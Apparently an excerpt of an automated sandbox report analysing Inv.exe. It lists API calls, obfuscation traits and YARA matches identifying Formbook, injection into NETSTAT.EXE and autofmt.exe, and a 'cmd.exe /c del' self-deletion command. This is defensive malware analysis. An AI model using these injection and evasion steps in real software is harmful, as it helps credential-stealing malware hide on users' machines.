Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198AD30 NtSetContextThread, 1_2_0198AD30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989520 NtWaitForSingleObject, 1_2_01989520
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989560 NtWriteFile, 1_2_01989560
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989FE0 NtCreateMutant, 1_2_01989FE0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A710 NtOpenProcessToken, 1_2_0198A710
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989730 NtQueryVirtualMemory, 1_2_01989730
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989770 NtSetInformationFile, 1_2_01989770
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A770 NtOpenThread, 1_2_0198A770
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989760 NtOpenProcess, 1_2_01989760
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896D0 NtCreateKey, 1_2_019896D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989610 NtEnumerateValueKey, 1_2_01989610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk, 4_2_02E59A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_02E59860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk, 4_2_02E59840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk, 4_2_02E599A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_02E59910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_02E596E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk, 4_2_02E596D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_02E59660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk, 4_2_02E59650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk, 4_2_02E59FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk, 4_2_02E59780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk, 4_2_02E59710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595D0 NtClose,LdrInitializeThunk, 4_2_02E595D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59540 NtReadFile,LdrInitializeThunk, 4_2_02E59540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A80 NtOpenDirectoryObject, 4_2_02E59A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A20 NtResumeThread, 4_2_02E59A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A00 NtProtectVirtualMemory, 4_2_02E59A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A10 NtQuerySection, 4_2_02E59A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A3B0 NtGetContextThread, 4_2_02E5A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59B00 NtSetValueKey, 4_2_02E59B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598F0 NtReadVirtualMemory, 4_2_02E598F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598A0 NtWriteVirtualMemory, 4_2_02E598A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5B040 NtSuspendThread, 4_2_02E5B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59820 NtEnumerateKey, 4_2_02E59820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599D0 NtCreateProcessEx, 4_2_02E599D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59950 NtQueueApcThread, 4_2_02E59950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59670 NtQueryInformationProcess, 4_2_02E59670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59610 NtEnumerateValueKey, 4_2_02E59610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E597A0 NtUnmapViewOfSection, 4_2_02E597A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59760 NtOpenProcess, 4_2_02E59760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A770 NtOpenThread, 4_2_02E5A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59770 NtSetInformationFile, 4_2_02E59770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59730 NtQueryVirtualMemory, 4_2_02E59730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A710 NtOpenProcessToken, 4_2_02E5A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595F0 NtQueryInformationFile, 4_2_02E595F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59560 NtWriteFile, 4_2_02E59560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59520 NtWaitForSingleObject, 4_2_02E59520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5AD30 NtSetContextThread, 4_2_02E5AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A060 NtClose, 4_2_0036A060
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A110 NtAllocateVirtualMemory, 4_2_0036A110
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369F30 NtCreateFile, 4_2_00369F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FE0 NtReadFile, 4_2_00369FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A08A NtAllocateVirtualMemory, 4_2_0036A08A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDC NtReadFile, 4_2_00369FDC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDA NtReadFile, 4_2_00369FDA
Detected potential crypto function
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123D929 0_2_0123D929
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012451BC 0_2_012451BC
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01247991 0_2_01247991
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012455E0 0_2_012455E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01240432 0_2_01240432
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0124683C 0_2_0124683C
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012460C0 0_2_012460C0
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01245B50 0_2_01245B50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040102F 1_2_0040102F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D1EF 1_2_0041D1EF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041E18E 1_2_0041E18E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041DAA3 1_2_0041DAA3
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409E40 1_2_00409E40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409E3C 1_2_00409E3C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D6FE 1_2_0041D6FE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123D929 1_2_0123D929
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123A951 1_2_0123A951
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012451BC 1_2_012451BC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01247991 1_2_01247991
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0124683C 1_2_0124683C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012460C0 1_2_012460C0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01245B50 1_2_01245B50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012455E0 1_2_012455E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01240432 1_2_01240432
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194F900 1_2_0194F900
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B090 1_2_0195B090
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A120A8 1_2_01A120A8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01002 1_2_01A01002
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197EBB0 1_2_0197EBB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0DBD2 1_2_01A0DBD2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12B28 1_2_01A12B28
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A122AE 1_2_01A122AE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12D07 1_2_01A12D07
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01940D20 1_2_01940D20
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11D55 1_2_01A11D55
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195841F 1_2_0195841F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11FF1 1_2_01A11FF1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A12EF7 1_2_01A12EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE22AE 4_2_02EE22AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFA2B 4_2_02ECFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED03DA 4_2_02ED03DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDDBD2 4_2_02EDDBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4EBB0 4_2_02E4EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AB40 4_2_02E3AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2B28 4_2_02EE2B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE28EC 4_2_02EE28EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE20A8 4_2_02EE20A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B090 4_2_02E2B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EEE824 4_2_02EEE824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1002 4_2_02ED1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1F900 4_2_02E1F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2EF7 4_2_02EE2EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E36E30 4_2_02E36E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDD616 4_2_02EDD616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1FF1 4_2_02EE1FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EEDFCE 4_2_02EEDFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDD466 4_2_02EDD466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2841F 4_2_02E2841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2D5E0 4_2_02E2D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE25DD 4_2_02EE25DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42581 4_2_02E42581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1D55 4_2_02EE1D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E10D20 4_2_02E10D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE2D07 4_2_02EE2D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036E18E 4_2_0036E18E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D1EF 4_2_0036D1EF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036DAAF 4_2_0036DAAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352D90 4_2_00352D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352D87 4_2_00352D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00359E3C 4_2_00359E3C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00359E40 4_2_00359E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D6FE 4_2_0036D6FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00352FB0 4_2_00352FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123BFC3 appears 38 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236EF1 appears 84 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01239160 appears 64 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236F06 appears 36 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01237021 appears 40 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0194B150 appears 35 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123715C appears 370 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02E1B150 appears 66 times
Sample file is different than original file name gathered from version info
Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
Uses 32bit PE files
Source: Inv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/0@7/3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Users\user\Desktop\Inv.exe Command line argument: Kernel32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: IEUCIZEO 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: Kernel32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: IEUCIZEO 1_2_01231040
Source: Inv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Inv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Inv.exe Virustotal: Detection: 39%
Source: Inv.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\Inv.exe File read: C:\Users\user\Desktop\Inv.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Inv.exe Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
Source: Inv.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012391A5 push ecx; ret 0_2_012391B8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D0DB push eax; ret 1_2_0041D142
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D13C push eax; ret 1_2_0041D142
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040F345 push edi; retf 1_2_0040F34C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012391A5 push ecx; ret 1_2_012391B8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
